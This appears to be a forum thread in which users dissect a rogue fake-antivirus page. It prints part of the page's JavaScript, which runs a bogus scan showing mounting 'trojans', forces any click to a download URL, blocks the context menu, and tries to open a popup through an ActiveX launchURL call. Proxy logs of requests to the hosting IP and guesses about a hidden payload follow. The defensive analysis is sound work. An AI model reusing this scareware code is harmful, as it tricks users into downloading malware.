window.open(LRUpop, "", popWindowOptions);
}
else if (!isXPSP2 && usePopDialog){
eval("window.showModalDialog(LRUpop,'',popDialogOptions)");
}
else {
document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u +
"'></object>";
iie.launchURL(LRUpop);
}
}
}
if (window.attachEvent)eval("window.attachEvent('onunload',ext);");
else window.addEventListener("unload", ext, false);
// --------------------------------------------------------------------------------
var
bar_start = 15;
var proc_interval;
var proc_count;
var filetext;
var be_start = 0;
jQuery.preloadImages = function (){
jQuery.each(arguments, function (e){
jQuery("<img>").attr("src", this );
}
);
}
$.preloadImages("images/page_progressbar.gif", "images/dvd.gif", "images/folder.gif",
"images/hdd.gif", "images/hrline.gif", "images/i4000000.gif", "images/i1000000.gif",
"images/i2000000.gif", "images/i3000000.gif", "images/i4000000.gif", "images/i5000000.gif"
, "images/i6000000.gif", "images/i7000000.gif", "images/inf20000.gif",
"images/progressbar.gif", "images/progressbar_green.gif", "images/qicon.gif",
"images/spacer.gif", "images/window1.gif", "images/alert.gif");
function dload(){
return window.location = dow_n_url;
}
jQuery.fn.new_show = function (){
return this .css({
visibility : "visible"
}
);
}
jQuery.fn.new_flash = function (proc_count, proc_countn, proc_countx){
proc_countn = Math.round(proc_countn - (100 - proc_count) / (100 - proc_countx) *
proc_countn);
this .html("
<img src='images/inf20000.gif' width='15' height='18' align='absmiddle'/><span class='troj
an_caption'>" + proc_countn + " trojans</span>");
return this .css({
visibility : "visible"
}
);
}
$(document).ready(function (){
$("body").html(my_body);
var left_bar_height = $(".left_bar").height();
var right_bar_height = $(".right_bar").height();
if (left_bar_height < right_bar_height){
$(".left_bar").height(right_bar_height);
}
$("body").click(function (){
dload();
return false;
}
);
$(document).bind("contextmenu", function (e){
return false;
}
);
}
);
function docload(){
$("#white").css("display", "none");
$("#page_progress").css("display", "none");
$(".left_bar").css("display", "block");
$(".progress_bar_gif").animate({
width : "0px"
}
, bar_start * 1000);
proc_interval = setInterval(animat_doc, bar_start * 10);
}
;
function animat_doc(){
proc_count = Math.round(100 - $(".progress_bar_gif").width() / 417 * 100);
$("#progress_proc").html(proc_count + "%");
if (proc_count < 100){
if (proc_count > 5){
$("#fileinfo1").new_show();
$("#desc").new_show();
$('#diskn3').new_flash(proc_count, 362, 5);
}
if (proc_count > 30){
$("#fileinfo2").new_show();
$('#diskn4').new_flash(proc_count, 155, 30);
}
if (proc_count > 55)$('#diskn1').new_flash(proc_count, 103, 55);
if (proc_count > 81){
$("#fileinfo3").new_show();
$('#diskn2').new_flash(proc_count, 7, 81);
}
filetext = "Now scanning: " + listname[Math.floor(Math.random() * listname.length)] +
"." + listras[Math.floor(Math.random() * listras.length)];
}
if (proc_count == 100 && be_start == 0){
filetext = "Scan complete. 527 fileinfos was found!";
// выводим алерт
// alert_txt(atxt2);
alert2();
$("#alert").css("left", ($(window).width() - 434) / 2 + "px");
$("#alert").css("top", ($(window).height() - 332) / 2 + "px");
$("#alert").css("display", "block");
// $("#alert").html("<EMBED TYPE='application/x-mplayer2'

// SRC='chord.wav' WIDTH=0 HEIGHT=0></EMBED>");
be_start = 1;
}
$("#file_scan_text").html(filetext);
}
function startdoc(){
if (window.attachEvent)a2way();
alert1();
window.moveTo(0, 0);
window.resizeTo(screen.width, screen.height);
window.focus();
}
startdoc();
</script>

Let me know what you think about it.


Thanks!

~~mike~~

This also may interest you:

http://forums.techarena.in/security-systems/1305750.htm

http://www.threatexpert.com/report.aspx?md5=cfefe8fd83577b7abacfcf844a7461c4

In the source of the page, it calls for this jscript:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js

It is still hosted there. (You also posted it in your code box in your initial post in this thread)

Here's someone else who caught it on the 22nd http://seclists.org/fulldisclosure/2010/Feb/389

After looking closer at my server log files... here are the requests made when you go to the infection link:


2010.3.1 2:34:46 - 192.168.1.79 http://94.102.52.38 *EXCEPTION* Exception client IP match. GET 223181 0 1 200 - Default -
2010.3.1 2:34:46 - 192.168.1.79 https://urs.microsoft.com:443 *EXCEPTION* Exception client IP match. CONNECT 5380 0 1 200 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/page_progressbar.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/dvd.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/hdd.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i1000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i3000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i7000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/inf20000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/folder.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i2000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/hrline.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i4000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/images/progressbar_green.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i5000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/i6000000.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/progressbar.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/qicon.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/spacer.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/alert.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:48 - 192.168.1.79 http://94.102.52.38/res/1/1/images/window1.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:49 - 192.168.1.79 https://telemetry.urs.microsoft.com:443 *EXCEPTION* Exception client IP match. CONNECT 5347 0 1 200 - Default -
2010.3.1 2:34:57 - 192.168.1.79 http://94.102.52.38/res/1/1/images/progressbar_green.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -
2010.3.1 2:34:57 - 192.168.1.79 http://94.102.52.38/res/1/1/images/box_top_.gif *EXCEPTION* Exception client IP match. GET 0 0 1 304 - Default -

I'm booting up my Ubuntu laptop to visit the page from it and try to see what other calls it makes. (I'm not willing to install rogue spyware on my windows machine right now ...heh.)

does firefox have the ability to detect it?

What I was concerned with is the fact that it backdoors on to the users system a "VirtualProtected" file and then when asked to download the free virus removal tool that gets past AV checks, made me wonder about decoding the payload.

As I am nolonger a windows user, I am stumped as to how you would go about decoding a windows encoded file on a non windows system.

It is clear to me that has more under the hood than just frightening people in to downloading the software.

IMHO the removal tool offered for download is just a front end that does not set off any alarms because it does not appear to be a virus but when downloaded and run, the front end uses the hidden payload to infect the users machine or do something with it.

Nice effort on what you done so far, I have no time at present to expend on this and no windows machine, so for me presently, I am at a dead end.

Do people seriously still fall for this trick >.> ?